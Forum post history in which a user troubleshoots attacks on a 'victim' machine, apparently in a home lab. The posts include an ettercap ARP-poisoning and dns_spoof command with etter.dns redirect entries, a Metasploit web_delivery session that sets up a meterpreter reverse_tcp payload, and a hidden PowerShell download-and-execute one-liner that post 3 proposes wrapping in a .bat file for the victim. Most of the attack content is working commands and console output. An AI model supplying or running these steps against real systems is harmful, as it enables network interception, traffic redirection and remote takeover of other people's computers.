pierre

Active Members
  • Posts: 106
Everything posted by pierre

  1. The command works with ettercap -T -q -i eth0 -P dns_spoof -M arp //192.168.0.2//

     Here is what I've done: I try to redirect a victim to my own Apache web server when he is on a particular URL. First I have a look at etter.dns:

         root@osboxes:~# vim /etc/ettercap/etter.dns

         # microsoft sucks ;)
         # redirect it to www.linux.org
         #
         microsoft.com      A   192.168.0.1
         *.microsoft.com    A   192.168.0.1
         www.microsoft.com  PTR 192.168.0.1      # Wildcards in PTR are not allowed

     So the victim should be spoofed when going to microsoft.com.

     I can ping my victim:

         root@osboxes:~# ifconfig eth0 192.168.0.1/24
         root@osboxes:~# ping 192.168.0.2
         PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.
         64 bytes from 192.168.0.2: icmp_seq=1 ttl=128 time=0.808 ms
         64 bytes from 192.168.0.2: icmp_seq=2 ttl=128 time=0.639 ms
         ^C
         --- 192.168.0.2 ping statistics ---
         2 packets transmitted, 2 received, 0% packet loss, time 1000ms
         rtt min/avg/max/mdev = 0.639/0.723/0.808/0.088 ms

     I activate the web server:

         root@osboxes:~# service apache2 start

     So now I enter this command:

         ettercap -T -q -i eth0 -P dns_spoof -M arp //192.168.0.2//

         ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

         Listening on:
           eth0 -> 08:00:27:1D:EC:A2
                   192.168.0.1/255.255.255.0
                   fe80::a00:27ff:fe1d:eca2/64

         SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
         Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
         Privileges dropped to EUID 65534 EGID 65534...

            33 plugins
            42 protocol dissectors
            57 ports monitored
         20388 mac vendor fingerprint
          1766 tcp OS fingerprint
          2182 known services
         Lua: no scripts were specified, not starting up!

         Randomizing 255 hosts for scanning...
         Scanning the whole netmask for 255 hosts...
         * |==================================================>| 100.00 %

         Scanning for merged targets (1 hosts)...
         * |==================================================>| 100.00 %

         3 hosts added to the hosts list...

         ARP poisoning victims:

          GROUP 1 : 192.168.0.2 08:00:27:3B:98:9D

          GROUP 2 : ANY (all the hosts in the list)

         Starting Unified sniffing...

         Text only Interface activated...
         Hit 'h' for inline help

         Activating dns_spoof plugin...

     But unfortunately, the victim can access microsoft.com, nothing is spoofed...

     PS: My victim has access to my web server by entering its IP address in the URL bar of its browser.
  2. Hello, I try to use the dns_spoof plugin on a victim machine. However, an error appears...

         root@osboxes:~# ettercap –i eth0 –T –q –P dns_spoof -M ARP /192.168.0.2.//

         ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

         TARGET (–i) contains invalid chars !

     The parameter "-i" requires an interface value, so what's wrong??

     PS: I can do the classic MITM with the graphical interface.
  3. Sorry, I misunderstood what I was doing. I would have to create a .bat file and paste the line:

         "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.0.1:8080/uochXT'))"

     :)
  4. Hello, I want the victim to download a webshell by connecting to my Apache web server. Everything seems fine, but when I create the webshell, I don't know where it is..... Look:

         msf > use exploit/multi/script/web_delivery
         msf exploit(web_delivery) > set LHOST 192.168.0.1
         LHOST => 192.168.0.1
         msf exploit(web_delivery) > set target 2
         target => 2
         msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
         payload => windows/meterpreter/reverse_tcp
         msf exploit(web_delivery) > show options

         Module options (exploit/multi/script/web_delivery):

            Name     Current Setting  Required  Description
            ----     ---------------  --------  -----------
            SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
            SRVPORT  8080             yes       The local port to listen on.
            SSL      false            no        Negotiate SSL for incoming connections
            SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
            URIPATH                   no        The URI to use for this exploit (default is random)

         Payload options (windows/meterpreter/reverse_tcp):

            Name      Current Setting  Required  Description
            ----      ---------------  --------  -----------
            EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
            LHOST     192.168.0.1      yes       The listen address
            LPORT     4444             yes       The listen port

         Exploit target:

            Id  Name
            --  ----
            2   PSH

         msf exploit(web_delivery) > exploit
         [*] Exploit running as background job.
         [*] Started reverse handler on 192.168.0.1:4444
         [*] Using URL: http://0.0.0.0:8080/6PXdn4l
         [*] Local IP: http://127.0.0.1:8080/6PXdn4l
         [*] Server started.
         [*] Run the following command on the target machine:
         powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.0.1:8080/6PXdn4l'))
         msf exploit(web_delivery) > [*] 192.168.0.2 web_delivery - Delivering Payload

     Afterwards I have to put the webshell in /var/www/html on my attack computer, but I can't find it.....

         root@osboxes:/# locate powershell.exe
         root@osboxes:/#

     Nothing is returned.... Have you got any solutions??